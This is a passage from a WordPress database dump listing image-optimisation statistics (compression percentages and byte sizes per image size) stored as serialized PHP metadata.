i:3798;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.690000000000001278976924368180334568023681640625;s:5:\"bytes\";i:2159;s:11:\"size_before\";i:8089;s:10:\"size_after\";i:5930;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:3645;s:11:\"size_before\";i:12296;s:10:\"size_after\";i:8651;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4420,1676,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.908622994018788432413202826865017414093017578125;s:5:\"bytes\";i:21003;s:11:\"size_before\";i:105497;s:10:\"size_after\";i:84494;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:480;s:11:\"size_before\";i:3943;s:10:\"size_after\";i:3463;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:888;s:11:\"size_before\";i:6387;s:10:\"size_after\";i:5499;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.14999999999999857891452847979962825775146484375;s:5:\"bytes\";i:4935;s:11:\"size_before\";i:23330;s:10:\"size_after\";i:18395;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:8326;s:11:\"size_before\";i:34819;s:10:\"size_after\";i:26493;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:820;s:11:\"size_before\";i:6496;s:10:\"size_after\";i:5676;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2069;s:11:\"size_before\";i:12058;s:10:\"size_after\";i:9989;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.870000000000000994759830064140260219573974609375;s:5:\"bytes\";i:3485;s:11:\"size_before\";i:18464;s:10:\"size_after\";i:14979;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4421,1675,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.90828178052237973361116019077599048614501953125;s:5:\"bytes\";i:19028;s:11:\"size_before\";i:91007;s:10:\"size_after\";i:71979;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:472;s:11:\"size_before\";i:3953;s:10:\"size_after\";i:3481;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.0299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:905;s:11:\"size_before\";i:6449;s:10:\"size_after\";i:5544;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4404;s:11:\"size_before\";i:19486;s:10:\"size_after\";i:15082;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.989999999999998436805981327779591083526611328125;s:5:\"bytes\";i:7430;s:11:\"size_before\";i:28584;s:10:\"size_after\";i:21154;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:828;s:11:\"size_before\";i:6107;s:10:\"size_after\";i:5279;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1824;s:11:\"size_before\";i:10545;s:10:\"size_after\";i:8721;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3165;s:11:\"size_before\";i:15883;s:10:\"size_after\";i:12718;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4422,1674,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.65282029821818099435404292307794094085693359375;s:5:\"bytes\";i:18754;s:11:\"size_before\";i:90806;s:10:\"size_after\";i:72052;s:4:\"time\";d:0.10999999999999998667732370449812151491641998291015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:415;s:11:\"size_before\";i:3621;s:10:\"size_after\";i:3206;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:869;s:11:\"size_before\";i:5996;s:10:\"size_after\";i:5127;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:4276;s:11:\"size_before\";i:19471;s:10:\"size_after\";i:15195;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.10000000000000142108547152020037174224853515625;s:5:\"bytes\";i:7589;s:11:\"size_before\";i:30238;s:10:\"size_after\";i:22649;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:752;s:11:\"size_before\";i:5556;s:10:\"size_after\";i:4804;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1811;s:11:\"size_before\";i:10227;s:10:\"size_after\";i:8416;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.379999999999999005240169935859739780426025390625;s:5:\"bytes\";i:3042;s:11:\"size_before\";i:15697;s:10:\"size_after\";i:12655;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4423,1673,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.59841947149882201983928098343312740325927734375;s:5:\"bytes\";i:17349;s:11:\"size_before\";i:104522;s:10:\"size_after\";i:87173;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.54000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:361;s:11:\"size_before\";i:4785;s:10:\"size_after\";i:4424;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:837;s:11:\"size_before\";i:7082;s:10:\"size_after\";i:6245;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3974;s:11:\"size_before\";i:22260;s:10:\"size_after\";i:18286;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.89999999999999857891452847979962825775146484375;s:5:\"bytes\";i:6978;s:11:\"size_before\";i:33388;s:10:\"size_after\";i:26410;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:715;s:11:\"size_before\";i:6749;s:10:\"size_after\";i:6034;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1703;s:11:\"size_before\";i:12305;s:10:\"size_after\";i:10602;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:2781;s:11:\"size_before\";i:17953;s:10:\"size_after\";i:15172;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4424,1672,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.534879052494229512149104266427457332611083984375;s:5:\"bytes\";i:17470;s:11:\"size_before\";i:99630;s:10:\"size_after\";i:82160;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:505;s:11:\"size_before\";i:4768;s:10:\"size_after\";i:4263;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.75;s:5:\"bytes\";i:942;s:11:\"size_before\";i:7391;s:10:\"size_after\";i:6449;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:3853;s:11:\"size_before\";i:20876;s:10:\"size_after\";i:17023;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:6937;s:11:\"size_before\";i:30604;s:10:\"size_after\";i:23667;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:843;s:11:\"size_before\";i:7186;s:10:\"size_after\";i:6343;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1707;s:11:\"size_before\";i:11869;s:10:\"size_after\";i:10162;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2683;s:11:\"size_before\";i:16936;s:10:\"size_after\";i:14253;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4425,1671,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.458367548037443839348270557820796966552734375;s:5:\"bytes\";i:20043;s:11:\"size_before\";i:121780;s:10:\"size_after\";i:101737;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:450;s:11:\"size_before\";i:4763;s:10:\"size_after\";i:4313;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:992;s:11:\"size_before\";i:8321;s:10:\"size_after\";i:7329;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.75;s:5:\"bytes\";i:4626;s:11:\"size_before\";i:26060;s:10:\"size_after\";i:21434;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.719999999999998863131622783839702606201171875;s:5:\"bytes\";i:7679;s:11:\"size_before\";i:38944;s:10:\"size_after\";i:31265;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:882;s:11:\"size_before\";i:7835;s:10:\"size_after\";i:6953;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2077;s:11:\"size_before\";i:14726;s:10:\"size_after\";i:12649;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:3337;s:11:\"size_before\";i:21131;s:10:\"size_after\";i:17794;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4426,1670,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:22.12154390203999554387337411753833293914794921875;s:5:\"bytes\";i:17578;s:11:\"size_before\";i:79461;s:10:\"size_after\";i:61883;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:320;s:11:\"size_before\";i:2904;s:10:\"size_after\";i:2584;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:736;s:11:\"size_before\";i:5244;s:10:\"size_after\";i:4508;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:4077;s:11:\"size_before\";i:17194;s:10:\"size_after\";i:13117;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:7309;s:11:\"size_before\";i:26170;s:10:\"size_after\";i:18861;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:629;s:11:\"size_before\";i:4940;s:10:\"size_after\";i:4311;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.879999999999999005240169935859739780426025390625;s:5:\"bytes\";i:1637;s:11:\"size_before\";i:9154;s:10:\"size_after\";i:7517;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:2870;s:11:\"size_before\";i:13855;s:10:\"size_after\";i:10985;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4427,1669,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.073914743840436614163991180248558521270751953125;s:5:\"bytes\";i:18880;s:11:\"size_before\";i:81824;s:10:\"size_after\";i:62944;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:450;s:11:\"size_before\";i:2877;s:10:\"size_after\";i:2427;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:842;s:11:\"size_before\";i:5604;s:10:\"size_after\";i:4762;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:4314;s:11:\"size_before\";i:17892;s:10:\"size_after\";i:13578;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:7467;s:11:\"size_before\";i:26384;s:10:\"size_after\";i:18917;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:725;s:11:\"size_before\";i:5103;s:10:\"size_after\";i:4378;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:1916;s:11:\"size_before\";i:9529;s:10:\"size_after\";i:7613;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3166;s:11:\"size_before\";i:14435;s:10:\"size_after\";i:11269;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4428,1668,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.92888533759488467467235750518739223480224609375;s:5:\"bytes\";i:22438;s:11:\"size_before\";i:125150;s:10:\"size_after\";i:102712;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:586;s:11:\"size_before\";i:5576;s:10:\"size_after\";i:4990;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1109;s:11:\"size_before\";i:8883;s:10:\"size_after\";i:7774;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:4829;s:11:\"size_before\";i:26052;s:10:\"size_after\";i:21223;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.780000000000001136868377216160297393798828125;s:5:\"bytes\";i:9231;s:11:\"size_before\";i:40526;s:10:\"size_after\";i:31295;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1007;s:11:\"size_before\";i:8631;s:10:\"size_after\";i:7624;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2225;s:11:\"size_before\";i:15135;s:10:\"size_after\";i:12910;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:3451;s:11:\"size_before\";i:20347;s:10:\"size_after\";i:16896;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4429,1655,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.268774138177658272752523771487176418304443359375;s:5:\"bytes\";i:3939;s:11:\"size_before\";i:34955;s:10:\"size_after\";i:31016;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:486;s:11:\"size_before\";i:5299;s:10:\"size_after\";i:4813;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:869;s:11:\"size_before\";i:7125;s:10:\"size_after\";i:6256;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:730;s:11:\"size_before\";i:6507;s:10:\"size_after\";i:5777;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1854;s:11:\"size_before\";i:16024;s:10:\"size_after\";i:14170;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4430,1651,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.203382866534273176739588961936533451080322265625;s:5:\"bytes\";i:4470;s:11:\"size_before\";i:43809;s:10:\"size_after\";i:39339;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:567;s:11:\"size_before\";i:5104;s:10:\"size_after\";i:4537;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:979;s:11:\"size_before\";i:9607;s:10:\"size_after\";i:8628;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:932;s:11:\"size_before\";i:9105;s:10:\"size_after\";i:8173;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1992;s:11:\"size_before\";i:19993;s:10:\"size_after\";i:18001;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4431,1650,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.2130453197797539388602672261185944080352783203125;s:5:\"bytes\";i:3077;s:11:\"size_before\";i:59025;s:10:\"size_after\";i:55948;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.96999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:422;s:11:\"size_before\";i:7070;s:10:\"size_after\";i:6648;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:737;s:11:\"size_before\";i:12764;s:10:\"size_after\";i:12027;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:714;s:11:\"size_before\";i:12102;s:10:\"size_after\";i:11388;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.44000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:1204;s:11:\"size_before\";i:27089;s:10:\"size_after\";i:25885;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4432,1649,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.85938994164828930166777354315854609012603759765625;s:5:\"bytes\";i:2490;s:11:\"size_before\";i:51241;s:10:\"size_after\";i:48751;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:338;s:11:\"size_before\";i:5639;s:10:\"size_after\";i:5301;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.20999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:556;s:11:\"size_before\";i:10664;s:10:\"size_after\";i:10108;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:496;s:11:\"size_before\";i:9934;s:10:\"size_after\";i:9438;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1100;s:11:\"size_before\";i:25004;s:10:\"size_after\";i:23904;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4433,1648,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.03560098695805447022166845272295176982879638671875;s:5:\"bytes\";i:3992;s:11:\"size_before\";i:56740;s:10:\"size_after\";i:52748;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.45999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:450;s:11:\"size_before\";i:6034;s:10:\"size_after\";i:5584;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:761;s:11:\"size_before\";i:11390;s:10:\"size_after\";i:10629;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:730;